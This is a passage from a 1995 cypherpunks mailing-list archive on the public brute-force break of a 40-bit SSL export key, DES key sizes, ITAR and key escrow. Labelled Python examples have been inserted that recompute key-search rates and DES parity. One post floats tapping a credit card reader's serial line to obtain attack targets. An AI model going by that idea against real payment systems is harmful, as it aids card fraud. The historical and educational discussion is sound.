o80KP3PExZ7BqPVrLK9at831SOOVBIN2qzkFcLo7VTOfsrtc95Oyit6Kkk6+PBQQ
4dmuTjbBtRTFi92a4r5RAIXBlLYaATGSZGI3UUSE4m/PoeOWwAhjl/sweu/g/1Q2
ZsRCz9wefR4=
=HlUL
-----END PGP SIGNATURE-----
 
____           Robert A. Hayden      <=> hayden@krypton.mankato.msus.edu
\  /__     Finger for Geek Code Info <=>    Finger for PGP Public Key
 \/  /           -=-=-=-=-=-                      -=-=-=-=-=-
   \/        http://krypton.mankato.msus.edu/~hayden/Welcome.html

-----BEGIN GEEK CODE BLOCK-----
Version: 3.1
GED/J d-- s:++>: a-- C++(++++) ULU++ P+ L++ E---- W+(-) N++++ o+ K+++ w---
O- M+ V-- PS++>$ PE++>$ Y++ PGP++ t- 5+++ X++ R+++>$ tv+ b+ DI+++ D+++
G+++++ e++ h r-- y++**
------END GEEK CODE BLOCK------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Kelly Goen <kelly@netcom.com>
Date: Thu, 17 Aug 95 15:34:03 PDT
To: aba@atlas.ex.ac.uk
Subject: Re: Another SSL breakage...
In-Reply-To: <7849.9508171510@exe.dcs.exeter.ac.uk>
Message-ID: <199508172217.PAA10756@netcom5.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



where can the software be obtained I would like to run it on my dual pentium
under solaris 2.4 for benchmarking...

     thanx in advance
     kelly




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Gillogly <jim@acm.org>
Date: Thu, 17 Aug 95 15:20:08 PDT
To: cypherpunks@toad.com
Subject: Re: More on Netscape
In-Reply-To: <9508172151.AA14704@argosy.MasPar.COM>
Message-ID: <199508172219.PAA04481@mycroft.rand.org>
MIME-Version: 1.0
Content-Type: text/plain



Various people said:
> >It says that the commerce server supports (among others) DES and DES3
> >(same as 3DES?).  They list the key sizes as 64 and 192 bits
> >respectively.  My question is, isn't DES 56 bits?  (with an 8 bit salt
> >that would be 64 I guess), but isn't DES3 112 bits, not 192?

> DES keys are specified as 64 bits, of which 8 bits provide odd parity.
> The 192 bits would specify three independent keys (not triple DES)

Real-world DES implementations ignore those 8 "parity" bits.  DES uses
56 bits of key for encryption, and calling it a 64 bit key is misleading.

Triple DES (3DES) is an overloaded term.  It's used in 2- and 3-key
versions, for 112 and 168 bits of protection respectively.

	Jim Gillogly
	Highday, 25 Wedmath S.R. 1995, 22:18
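
[Added example, not part of the post above: a key-material check that strips the DES parity bits and reports the nominal key bits of a DES or triple-DES key bundle, matching the 64-vs-56 and 192-vs-168/112 figures discussed in this thread.  The function names and the sample keys are constructed for illustration; EDE (encrypt-decrypt-encrypt) ordering is assumed for triple DES.]

```python
def set_odd_parity(key: bytes) -> bytes:
    """Force the low bit of each byte so every byte has an odd number of 1 bits."""
    out = bytearray()
    for b in key:
        high7 = b & 0xFE
        ones = bin(high7).count("1")
        out.append(high7 | (0 if ones % 2 else 1))
    return bytes(out)


def has_odd_parity(key: bytes) -> bool:
    return all(bin(b).count("1") % 2 == 1 for b in key)


def effective_key56(key: bytes) -> int:
    """Return the 56 bits DES actually uses: the top 7 bits of each of 8 bytes."""
    if len(key) != 8:
        raise ValueError("a DES key is 8 bytes (64 bits including parity)")
    value = 0
    for b in key:
        value = (value << 7) | (b >> 1)
    return value


def nominal_key_bits(bundle: bytes) -> int:
    """Nominal key bits for an 8-, 16- or 24-byte DES / triple-DES (EDE) bundle."""
    if len(bundle) not in (8, 16, 24):
        raise ValueError("expected 8, 16 or 24 bytes")
    parts = [effective_key56(bundle[i:i + 8]) for i in range(0, len(bundle), 8)]
    if len(parts) == 1:
        return 56
    if len(parts) == 2:
        parts.append(parts[0])            # two-key form reuses K1 as K3
    k1, k2, k3 = parts
    if k1 == k2 or k2 == k3:
        return 56                         # EDE collapses to a single DES operation
    if k1 == k3:
        return 112                        # two independent keys
    return 168                            # three independent keys


if __name__ == "__main__":
    k1 = bytes.fromhex("0123456789abcdef")    # constructed sample keys
    k2 = bytes.fromhex("fedcba9876543210")
    k3 = bytes.fromhex("89abcdef01234567")
    k1_bad_parity = bytes.fromhex("0022446688aaccee")   # k1 with parity bits flipped
    print(effective_key56(k1) == effective_key56(k1_bad_parity))   # same 56-bit key
    print(nominal_key_bits(k1 + k2 + k3), nominal_key_bits(k1 + k2 + k1_bad_parity))
```

A 192-bit bundle whose third key differs from the first only in parity bits is still a two-key bundle, which is why key sizes quoted with parity included overstate the search space.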




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Darrell Perko <dperko@efn.org>
Date: Thu, 17 Aug 95 15:26:30 PDT
To: cypherpunks@toad.com
Subject: I need an exportable crypto algorithm.
Message-ID: <Pine.SUN.3.91.950817151721.6913A-100000@haus.efn.org>
MIME-Version: 1.0
Content-Type: text/plain


Greetings;
	I realize that bad crypto is offensive to some here but I am in 
desperate need of an exportable, public-domain, general-purpose crypto
algorithm.  Or at least the rules for creating such.

	Sorry to bother y'all with this, but I am in dire straits.

	Thanks,
	Darrell Perko
	dperko@efn.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Damien.Doligez@inria.fr (Damien Doligez)
Date: Thu, 17 Aug 95 06:52:59 PDT
To: cypherpunks@toad.com
Subject: Re:  Phone call for Mr. Doligez, was Re: SSL challenge -- broken !
Message-ID: <9508171352.AA02309@couchey.inria.fr>
MIME-Version: 1.0
Content-Type: text/plain


>In general, it just adds more flames to the fire started by the
>letter written by Microsoft, IBM and Lotus. Their point is bolstered
>by this easy attack.

Well, that was the whole point of the challenge, wasn't it ?
Why didn't the journalists write their articles one month ago
when Hal posted his challenge ?

What I find surprising is that it took as long as one month.  I was
even surprised when it wasn't done after two weeks, and that's when I
started working on it.

-- Damien
P.S. check out <URL:http://pauillac.inria.fr/~doligez/ssl/press-conf.html>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: droelke@spirit.aud.alcatel.com (Daniel R. Oelke)
Date: Thu, 17 Aug 95 14:25:23 PDT
To: aba@dcs.exeter.ac.uk
Subject: Re: Silly technical question from a non-technical person
Message-ID: <9508172055.AA15978@spirit.aud.alcatel.com>
MIME-Version: 1.0
Content-Type: text/plain



> 
> - For DES I think so, asked for others opinions, this might be the
>   next one to die, big project but possibly doable with lots of keys
>   at once
> 

But, what is a good DES target to attack??  SSL was a great target
because it is both visible and because it has a well
defined open specification that made it easy to determine 
exactly what to attack (unlike Microsoft Access).

I know someone who *used* to be in the ATM transaction 
business, but is no longer.  Is the code from a credit card
reader DES encrypted?  We could possibly "tap" the serial
port between the reader and the modem and get a byte 
stream in that manner.... but then again, my knowledge
of those beasts is pretty limited.

Dan

------------------------------------------------------------------
Dan Oelke                                  Alcatel Network Systems
droelke@aud.alcatel.com                             Richardson, TX
http://spirit.aud.alcatel.com:8081/~droelke/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Sean A. Walberg" <sean@escape.ca>
Date: Thu, 17 Aug 95 14:03:07 PDT
To: cypherpunks@toad.com
Subject: More on Netscape
Message-ID: <Pine.SOL.3.91.950817155625.15215j-100000@wpg-01.escape.ca>
MIME-Version: 1.0
Content-Type: text/plain


I guess most everybody has seen the response that Netscape put on their 
page, but did people check out the "for more info" link 
(http://home.netscape.com/newsref/std/key_security.html)

It says that the commerce server supports (among others) DES and DES3 
(same as 3DES?).  They list the key sizes as 64 and 192 bits 
respectively.  My question is, isn't DES 56 bits?  (with an 8 bit salt 
that would be 64 I guess), but isn't DES3 112 bits, not 192?

Just wondering...

Sean

o-------------------o----------------------o-----------------------o
|   Sean Walberg,   |    Tech Support      | Pas_al, _obol, BASI_, |
|  sean@escape.ca   | escape communication |   PostS_ript, T_L...  |
| Mail for PGP key  |      925-4290        | C fills all the holes |
o----------------] http://www.escape.ca/~sean [--------------------o





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Damien.Doligez@inria.fr (Damien Doligez)
Date: Thu, 17 Aug 95 07:04:41 PDT
To: cypherpunks@toad.com
Subject: Re: SSL challenge -- broken !
Message-ID: <9508171404.AA02355@couchey.inria.fr>
MIME-Version: 1.0
Content-Type: text/plain


>From: Joe Buck <jbuck@Synopsys.COM>
>However, I disagree with your conclusion:
[...]
>There's plenty of stuff that *does* need protection, but I'm not sure
>credit card #'s head the list.

You're right, of course, if you discount the hassle of getting the
transactions cancelled whenever your credit card number is used
fraudulently.

I have a much better example (and a real one, too):

I have an account at Wells Fargo Bank near San Francisco.  They
recently started offering web access to their customers.  That would
be great for me because banking by phone is pretty expensive when I'm
in France, and it's not always easy for me to understand American
accents.

So they would give me a password that I can use for some set of
operations.  I don't know which one exactly, but I would expect it to
include electronic transfers from my account to anywhere else.  The
password is protected by the SSL connection.  That would be fine if I
had the full SSL security, but in France I can only get the exportable
version of Netscape.  As a result, I won't be using this service.

There's the beginning of a market for full-SSL clients and servers
outside the US.  Maybe Netscape should go multinational right now.

-- Damien




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aba@dcs.exeter.ac.uk
Date: Thu, 17 Aug 95 08:11:06 PDT
To: cypherpunks@toad.com
Subject: Another SSL breakage...
Message-ID: <7849.9508171510@exe.dcs.exeter.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


All hell seems to have broken loose whilst I was lazing on the beach
yesterday.  SSL breakings, big name newspaper newsreports (of varying
degrees of accuracy), and much ITAR bashing (yay!) or perhaps that
should be nooooh! 'cos I might be doing myself out of work as a UK
crypto hacker (as John Hemming said in the article Robert Hettinga
forwarded) if we lose the fun advantage of being in the free world,
and not having to follow the ITAR nonsense.

Anyway, congratulations Damien!

As Hal said, another group was working on the SSL challenge (albeit
just for software testing purposes).  Here's the story....

on Tue, 15 Aug 1995 10:43:15 +0200 I received this from David Byers
<davby@ida.liu.se>:

> Eureka!
>  
> Encrypted Master Key: 7ef0961fa6
>  
> [...]

So who was first?  David hit it Tue 10:43 GMT+2.

Doesn't matter, the more the merrier, and the better to demonstrate
the silly ITAR export restrictions.

This was a trial run at breaking it which two people had done just to
check if their respective software was working correctly.  It appears
that it was :-).  This testing was some of the reason for the slowness
in getting the group effort started, we were very keen to ensure it
really would work, and that the software was working perfectly.
Disappointment with the RC4 bruting demonstrated the importance of
checking first.  On with the story,

David's eureka arrived Tuesday, I tinkered with it some, but was
interpreting it wrongly and left it for that day, then I was away
yesterday (at the beach with wife and kids, nice weather over here),
and figured out how to apply the key this morning (with a bit of
prompting from Hal as to what I was doing wrong), just after reading
Damien's announce on cpunks, where he independently bruted it on a
farm of workstations.

Here's the output, with the "Mr Cosmic Kumquat" from "SSL Trusters Inc":

> PPOST /order2.cgi HTTP/1.0Referer: https://order.netscape.com/order2.cgi
> User-Agent: Mozilla/1.1N (Macintosh; I; PPC)
> Accept: */*
> Accept: image/gif
> Accept: image/x-xbitmap
> Accept: image/jpeg
> Content-type: application/x-www-form-urlencoded
> Content-length: 472
> 
> source-form=order2-cust.html&order_number=31770&prod_80-01020-00_Mac=1&carrier_code=UM&ship_first=Cosmic&ship_last=Kumquat&ship_org=SSL+Trusters+Inc.&ship_addr1=1234+Squeamish+Ossifrage+Road&ship_addr2=&ship_city=Anywhere&ship_state=NY&ship_zip=12345&ship_country=USA&ship_phone=&ship_fax=&ship_email=&bill_first=&bill_last=&bill_org=&bill_addr1=&bill_addr2=&bill_city=&bill_state=&bill_zip=&bill_country=USA&bill_phone=&bill_fax=&bill_email=&submit=+Submit+Customer+Data+

(I won't bother formatting it more cleanly as Damien has already done
the honors).

I think a group effort ought to be done now that we are confident of
the software, just to see how darn fast we (cypherpunks as a group)
can knock off SSL keys.  (This one was done by 2 people for testing
purposes, and independently by Damien (who we didn't know was working
on it)).  I'd really like to work up to a really meanly few hours
breakage, as it looks that much more impressive.  The next media
release ought to be of a steady offer, of the form, cpunks break keys
in x hours, where x is a very small number.  And not just break one
key, but will break lots of keys, as required, until something is done
about it (ITAR) :-)

Eric Young is currently away on holiday, but I have his machine stats
from earlier email, where he explained the hardware he was testing on.

Eric swept 8000 - FFFF, and David 0000 - 7ef0 (where he hit the key)

Machine stats for this bruting:

1 x 16k processor MasPar MP-1 - 1.5M keys/sec

4 CPUs of R4400 200mhz	      - 24000 keys/sec
4 CPUs of sparc  60mhz	      - 17500 keys/sec
2 CPUs of sparc  50mhz        - 14800 keys/sec
1 CPU of Pentium 75mhz	      - 10200 keys/sec
1 CPU of Alpha		      - 10000 keys/sec
2 CPUs of 88100		      -  8000 keys/sec
1 CPU of 88000		      -  3500 keys/sec
1 CPU of R3000 36mhz	      -  3800 keys/sec
49 CPUs of 486DX 50mhz	      -  3780 per src

The workstations total: - 424,320 keys/sec, and the Maspar 1.5M keys/sec
on its own.

The 0000 - 8000 sweep was finished Aug 11 (he might have finished a
day or two earlier, that's when he replied to my question as to how he
was getting on).  He left for his holiday after that email.

The MasPar sweepings were going fast, swept 0000 - 795d (this was
sometime before the 11th Aug) but someone else wanted the machine, so
a pause ... and then (presumably Tues morning) 795d - 7ef0 and bang he
hit it.

We were getting worried about the possibility of software failure by
then as we'd already swept 8000 - FFFF and 0000 - 795D accounting for
97.4% of the key space.

It was hiding away in the last bit of unswept keyspace.  Luck of the
draw...

A few quick calculations:

The maspar alone could do the entire keyspace in 8 1/2 days, or an
expected average time of ~100 hours.  I believe I'm right that there
would be lots of organisations which would sell you idle maspar hours
for a lot less than $100 / hr.

Heck you could do it with PC's, if they (WSJ article) think it's worth
$10k all I can say is "give me the $10k", and I'll do it and make a
handsome profit.

The workstation farm, at 424k keys/sec could do the job in 30 days, or
15 days average.  The workstation farm was only used to sweep half the
key space, and was used overnight (12 hours) and weekends (61 hours)
only as people were using the machines during the day.

Could it have been done without anyone knowing?  Hell, yes - it was
in fact, no announce was made as it was just testing etc.

Adam
- --
HAVE *YOU* EXPORTED RSA TODAY? --> http://dcs.ex.ac.uk/~aba/rsa/
- --rsa--------------------------8<-------------------------------
#!/bin/perl -s-- -export-a-crypto-system-sig -RSA-3-lines-PERL
$m=unpack(H.$w,$m."\0"x$w),$_=`echo "16do$w 2+4Oi0$d*-^1[d2%Sa
2/d0<X+d*La1=z\U$n%0]SX$k"[$m*]\EszlXx++p|dc`,s/^.|\W//g,print
pack('H*',$_)while read(STDIN,$m,($w=2*$d-1+length($n)&~1)/2)
- -------------------------------8<-------------------------------
TRY: rsa -k=3 -n=7537d365 < msg | rsa -d -k=4e243e33 -n=7537d365

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

-----END PGP SIGNATURE-----
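
[Added example, not part of the original message or of the software used in the break: a Python re-derivation of the throughput, coverage and sweep-time figures quoted above, as a way to size a key length against a known search rate. It assumes the quoted ranges (8000 - FFFF, 0000 - 795d) are the leading 16 bits of the 40-bit key and that each listed rate is per CPU; the 56-bit comparison goes beyond the message.]

```python
import re

# Workstation list as quoted in the message (assumption: rates are per CPU).
FARM_STATS = """\
4 CPUs of R4400 200mhz   - 24000 keys/sec
4 CPUs of sparc  60mhz   - 17500 keys/sec
2 CPUs of sparc  50mhz   - 14800 keys/sec
1 CPU of Pentium 75mhz   - 10200 keys/sec
1 CPU of Alpha           - 10000 keys/sec
2 CPUs of 88100          -  8000 keys/sec
1 CPU of 88000           -  3500 keys/sec
1 CPU of R3000 36mhz     -  3800 keys/sec
49 CPUs of 486DX 50mhz   -  3780 per src
"""
MASPAR_RATE = 1_500_000   # keys/sec, as quoted
KEY_BITS = 40             # secret key bits in the export cipher
PREFIX_BITS = 16          # assumption: ranges are 16-bit key prefixes

# Ranges reported as swept before the hit, as half-open [start, end).
SWEPT = [(0x8000, 0x10000), (0x0000, 0x795D)]

ROW = re.compile(r"^\s*(\d+)\s+CPUs?\s+of\s+(.+?)\s+-\s+(\d+)\b")


def parse_farm(text):
    """Return (cpu_count, machine, keys_per_sec_per_cpu) for each row."""
    rows = []
    for line in text.splitlines():
        m = ROW.match(line)
        if m:
            rows.append((int(m.group(1)), m.group(2).strip(), int(m.group(3))))
    return rows


def farm_rate(text):
    """Aggregate keys/sec of the whole workstation farm."""
    return sum(count * rate for count, _, rate in parse_farm(text))


def swept_fraction(ranges, prefix_bits=PREFIX_BITS):
    """Fraction of the keyspace covered by the ranges, overlaps merged."""
    total = 1 << prefix_bits
    covered, reach = 0, 0
    for start, end in sorted(ranges):
        start, end = max(start, reach), min(end, total)
        if end > start:
            covered += end - start
            reach = end
    return covered / total


def in_swept(prefix, ranges):
    """True if a key prefix falls inside any swept range."""
    return any(start <= prefix < end for start, end in ranges)


def sweep_seconds(bits, keys_per_sec):
    """Seconds to try every key of the given length at a fixed rate."""
    return (1 << bits) / keys_per_sec


def report():
    """Collect the figures the message quotes, recomputed from its inputs."""
    farm = farm_rate(FARM_STATS)
    return {
        "farm_keys_per_sec": farm,
        "swept_percent": round(100 * swept_fraction(SWEPT), 1),
        "maspar_full_days": round(sweep_seconds(KEY_BITS, MASPAR_RATE) / 86400, 1),
        "maspar_expected_hours": round(sweep_seconds(KEY_BITS, MASPAR_RATE) / 2 / 3600),
        "farm_full_days": round(sweep_seconds(KEY_BITS, farm) / 86400),
        # Beyond the message: same combined hardware against a 56-bit key.
        "combined_56bit_years": round(
            sweep_seconds(56, farm + MASPAR_RATE) / (86400 * 365.25)),
    }


if __name__ == "__main__":
    for name, value in report().items():
        print(f"{name:>24}: {value}")
```

Each added key bit doubles every time figure here, so the 16 bits between a 40-bit and a 56-bit key multiply the sweep time by 65,536 at the same rate.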





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "George T. Talbot" <george@knucklehead.phat.com>
Date: Thu, 17 Aug 95 13:31:37 PDT
To: cypherpunks@toad.com
Subject: Dumb question (Re: RSA T-Shirt)
Message-ID: <199508172022.QAA16980@knucklehead.phat.com>
MIME-Version: 1.0
Content-Type: text/plain


Sorry to bother the entire list with this...anybody got the e-mail 
address of the USA seller of the 3-lines of Perl RSA T-Shirt?  I haven't
received mine yet and I can't find the e-mail address.

Again...Sorry for adding to the traffic.

----------
George T. Talbot
<george@phat.com>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anon-remailer@utopia.hacktic.nl (Anonymous)
Date: Thu, 17 Aug 95 07:35:16 PDT
To: cypherpunks@toad.com
Subject: UK Independent on SSL crack
Message-ID: <199508171435.QAA05353@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain



from the "ukpipeline" :-)


>>>>>>>>>>>>>>>>>>>>

UK Independent newspaper, 17/8/1995

Internet's 30bn Pound Secret Revealed

Charles Arthur
Technology Correspondent

A French student has cracked the most commonly used encryption system 
used to pass financial transactions over the Internet, threatening a 
business forecast to be worth billions of pounds worldwide.

Damien Doligez, 27, a PhD student at the Inria research centre near 
Paris, broke a software "key" used by the Netscape browsing program, 
which lets users navigate the World Wide Web.

With Netscape, Internet users can visit shopping "sites" on the Web and 
order goods by sending their credit card and address over the network to 
the site.  To prevent anyone picking up those confidential details as 
they pass through the network, they are encrypted first using a software 
"key".  This is the system used for example by Barclays Bank's 
"BarclaySquare" project, launched in May, which offers access to eight 
major retailers.  Market research companies forecast that money 
transmission over the Internet will be worth more than 30bn pounds by 
2005.

At the launch of BarclaySquare, Roger Alexander, managing director of the 
unit said: "The encryption method has been rigorously tested by us".  But 
Mr. Doligez has compromised that security by decoding a test example of 
an encrypted transaction, posted on a number of Internet discussion 
groups in July.

The transaction was scrambled using a digital key 40 bits long, which 
offers about 1,000 billion (a million million) possible combinations.  
Mr Doligez harnessed spare time on 120 workstations and parallel 
computers.  The computers turned up the answer after eight days.

"I wouldn't trust my credit card number to Netscape," Mr Doligez told the 
Independent from Paris yesterday.

Netscape Communications, whose flotation on the New York Stock Exchange 
raised more than $1bn, said "We have always said this would be 
theoretically possible."

[end]





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Darrell Perko <dperko@efn.org>
Date: Thu, 17 Aug 95 16:42:21 PDT
To: cypherpunks@toad.com
Subject: I need exportable crypto revisited.
Message-ID: <Pine.SUN.3.91.950817163344.7854B@haus.efn.org>
MIME-Version: 1.0
Content-Type: text/plain


Greetings;

	Thank you all for your amazingly quick responses!  However, I
should have noted in my original message that this encryption is to meet
a contractual point for a commercial product to be delivered soon.  The
product can have one and one only version to be boxed and shipped and
will be sold internationally.  The encryption portion will be dynamically
linked, so real encryption will be available on the net just not in the box.

	Thanks,
	Darrell Perko
	dperko@efn.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andy Brown <asb@nexor.co.uk>
Date: Thu, 17 Aug 95 09:29:37 PDT
To: cypherpunks@toad.com
Subject: Re: Netsacpe's Offical Response
In-Reply-To: <199508171711.MAA02559@spectrum.bradley.edu>
Message-ID: <Pine.SOL.3.91.950817172311.26996D-100000@eagle.nexor.co.uk>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 17 Aug 1995, Glenn Powers forwarded Netscape's official response:

> So in conclusion, we think RC4-40 is strong enough to protect consumer-level
> credit-card transactions -- since the cost of breaking the message is
> sufficiently high to make it not worth the computer time required to do so

That was a rather silly thing to say.


- Andy




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Gillogly <jim@acm.org>
Date: Thu, 17 Aug 95 17:30:36 PDT
To: cypherpunks@toad.com
Subject: Re: I need exportable crypto revisited.
In-Reply-To: <199508180000.UAA00325@frankenstein.piermont.com>
Message-ID: <199508180030.RAA04988@mycroft.rand.org>
MIME-Version: 1.0
Content-Type: text/plain



> "Perry E. Metzger" <perry@piermont.com> writes:
> If you have hooks for arbitrary encryption, you will find it to be
> virtually impossible to export the product.

That's my understanding also (as I told him in e-mail) but I haven't found
any legal justification for it.  I spent a while poring over the ITARs,
section XIII.b (ftp://ftp.cygnus.com/pub/export/itar.in.full), and I
didn't see anything that looked likely.  Maybe "ancillary equipment" in
XIII.b.5, but that seems a stretch and is not at all specific.

I note that hash algorithms for message authentication are specifically
excluded from control in XIII.b.1.vi, which conflicts with what I was told
by somebody who'd gotten a nastygram from Commerce.  Sort of a relief,
since I've been giving my SHA implementation away freely
(rand.org:pub/jim/sha.tar.gz).

Has anybody who's been impaled on the stinky end of this stick been told the
chapter and verse?

	Jim Gillogly
	Sterday, 26 Wedmath S.R. 1995, 00:21




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Damien.Doligez@inria.fr (Damien Doligez)
Date: Thu, 17 Aug 95 08:35:45 PDT
To: cypherpunks@toad.com
Subject: Re:  Another SSL breakage...
Message-ID: <9508171532.AA02772@couchey.inria.fr>
MIME-Version: 1.0
Content-Type: text/plain


>From: aba@atlas.ex.ac.uk
>on Tue, 15 Aug 1995 10:43:15 +0200 I received this from David Byers
><davby@ida.liu.se>:
>
>> Eureka!
>>
>> Encrypted Master Key: 7ef0961fa6

Then David beat me by about two hours.  My program found the result at
12:23 +0200 on the same day.  I was not at work (aug 15 is a holiday
in France), so I saw it a few hours later, and I wrote my announcement
yesterday.

I will happily redirect all the journalists to David...

-- Damien




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Rev. Mark Grant" <mark@unicorn.com>
Date: Thu, 17 Aug 95 09:44:51 PDT
To: cypherpunks@toad.com
Subject: Re: Netsacpe's Offical Response
Message-ID: <Pine.3.89.9508171736.A1363-0100000@unicorn.com>
MIME-Version: 1.0
Content-Type: text/plain



>      In this case he had to use roughly
>      $10,000 worth of computing power (ballpark figure for having access to
>      120 workstations and a few parallel supercomputers for 8 days) to break
>      a single message.

Hmm, I don't know about anyone else around here, but my workstation is
idle 99% of the time. I could almost certainly get access to all the spare
CPU cycles on 120 workstations for free, and I suspect that a lot of
people (particularly hackers) could do so as well. There's no need to
spend $ 10,000 on renting them. 

	Mark





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: banisar@epic.org (Dave Banisar)
Date: Thu, 17 Aug 95 14:49:34 PDT
To: cypherpunks@toad.com
Subject: Non-News Govt Announcement on Key Escrow
Message-ID: <v01530501ac59673a4252@[205.177.25.31]>
MIME-Version: 1.0
Content-Type: text/plain


The White House and NIST announced today that they were planning to hold two
open meetings next month to develop standards for "acceptable" software key
escrow.  The standards will then be made into a FIPS. The programs cannot
have keys larger than 64 bits.

It's great to see that it only took them 18 months (since Feb. 94) to come
up with a call for public meetings for something that nobody really wants
anyway, except for the officials who plan to make it mandatory by slipping
it through bit by bit and a couple of vendors.  (sorry, sarcasm mode
off...)


-d (in non-official sarcastic mode today from home)


David Banisar (Banisar@epic.org)       * 202-544-9240 (tel)
Electronic Privacy Information Center  * 202-547-5482 (fax)
666 Pennsylvania Ave, SE, Suite 301    * ftp/gopher/wais cpsr.org
Washington, DC 20003                  * HTTP://epic.digicash.com/epic






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Pierre Uszynski <pierre@shell.portal.com>
Date: Thu, 17 Aug 95 18:21:30 PDT
To: cypherpunks@toad.com
Subject: Re: SSL challenge -- broken !
Message-ID: <199508180058.RAA02949@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain



Says Joe Buck:

> > >Should some bad person get hold of your card number and misuse
> > >it, you're not out any money: 
> > 
> > I'm not so sure....Checked the fees/interest lately?
> > "There ain't no such thing as a free credit card theft."
>
> Yes, it's true that this contributes to high interest rates (though
> defaults cost more than fraud).

Certainly not only that. In fact you pay directly for weak credit card
security through taxes used to legislate, police, try, and jail
fraudsters. Add to that the cost to society of keeping these people in
jail instead of more productive occupations. Add the time wasted
straightening out bogus transactions. Add the cost of delaying
purchases and action because of the (maybe irrational) fear that no
secure payment system is available.

The argument that fraud existed before credit cards is only a
technically correct statement. It does not bear. The point is, credit
card transactions could be much more secure, at sometimes trivial cost,
making much fraud disappear. Unfortunately, in this case, insecure
credit cards are not an obstacle to banks making money, so why should
they care?  Credit card fraud does not prevent politicians from being
re-elected, so why should they care?  Same would apply to car
manufacturers: easily stolen cars do not prevent them from making
money, so why should they care?

When 'bad persons' misuse credit cards, the cost to us is very real,
just well hidden by all involved.

Pierre.
pierre@shell.portal.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ian S. Nelson" <ian@bvsd.k12.co.us>
Date: Thu, 17 Aug 95 17:01:44 PDT
To: sean@escape.ca (Sean A. Walberg)
Subject: Re: More on Netscape
In-Reply-To: <Pine.SOL.3.91.950817155625.15215j-100000@wpg-01.escape.ca>
Message-ID: <199508180001.SAA18182@bvsd.k12.co.us>
MIME-Version: 1.0
Content-Type: text/plain


> 
> I guess most everybody has seen the response that Netscape put on their 
> page, but did people check out the "for more info" link 
> (http://home.netscape.com/newsref/std/key_security.html)
> 
> It says that the commerce server supports (among others) DES and DES3 
> (same as 3DES?).  They list the key sizes as 64 and 192 bits 
> respectively.  My question is, isn't DES 56 bits?  (with an 8 bit salt 
> that would be 64 I guess), but isn't DES3 112 bits, not 192?
> 
> Just wondering...
> 

That would be one key for encrypting, another key for decrypting and a third
key for encrypting again.  64*3=192.
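
[Added example, not part of any message in this thread: a Python sketch of the key-size arithmetic being discussed, using the point made in Jim Gillogly's reply that 8 bits of each 64-bit DES key are parity bits that implementations ignore. It assumes the standard layout (the low bit of each key byte is an odd-parity bit) and the encrypt-decrypt-encrypt ordering described above; the sample keys are constructed for illustration.]

```python
def strip_parity(block: bytes) -> int:
    """Return the 56 bits of an 8-byte DES key that the cipher actually uses."""
    if len(block) != 8:
        raise ValueError("a DES key block is exactly 8 bytes")
    value = 0
    for byte in block:
        value = (value << 7) | (byte >> 1)   # drop the low (parity) bit
    return value


def set_odd_parity(block: bytes) -> bytes:
    """Rewrite the low bit of each byte so every byte has odd parity."""
    out = bytearray()
    for byte in block:
        high7 = byte & 0xFE
        parity_bit = 1 if bin(high7).count("1") % 2 == 0 else 0
        out.append(high7 | parity_bit)
    return bytes(out)


def describe_key(key: bytes):
    """Return (raw_bits, independent_key_bits) for a DES or triple-DES key.

    raw_bits counts every stored bit, parity included (64 or 192).
    independent_key_bits counts only bits that change the cipher's output.
    """
    if len(key) not in (8, 24):
        raise ValueError("expected an 8-byte DES or 24-byte 3DES key")
    parts = [strip_parity(key[i:i + 8]) for i in range(0, len(key), 8)]
    raw_bits = len(key) * 8
    if len(parts) == 1:
        return raw_bits, 56
    k1, k2, k3 = parts
    if k1 == k2 or k2 == k3:
        # Encrypt-decrypt with the same key cancels: this is single DES.
        return raw_bits, 56
    if k1 == k3:
        return raw_bits, 112      # two-key variant
    return raw_bits, 168          # three-key variant


# Constructed sample keys (not taken from any real system).
K1 = bytes.fromhex("0123456789abcdef")
K2 = bytes.fromhex("fedcba9876543210")
K3 = bytes.fromhex("89abcdef01234567")
# Same key as K1 with every parity bit flipped.
K1_FLIPPED = bytes(b ^ 0x01 for b in K1)

if __name__ == "__main__":
    print("K1 and K1_FLIPPED use the same 56 bits:",
          strip_parity(K1) == strip_parity(K1_FLIPPED))
    for label, key in [("DES", K1), ("3DES, three keys", K1 + K2 + K3),
                       ("3DES, K1 = K3", K1 + K2 + K1_FLIPPED),
                       ("3DES, K1 = K2", K1 + K1 + K3)]:
        raw, independent = describe_key(key)
        print(f"{label:>18}: {raw} bits stored, {independent} independent")
```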




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Rev. Mark Grant" <mark@unicorn.com>
Date: Thu, 17 Aug 95 10:02:57 PDT
To: steve@webmedia.com
Subject: First known purchase of physical goods with cyberbucks
Message-ID: <Pine.3.89.9508171704.A1363-0100000@unicorn.com>
MIME-Version: 1.0
Content-Type: text/plain



[Feel free to forward to anywhere you feel is appropriate]

-----BEGIN PGP SIGNED MESSAGE-----


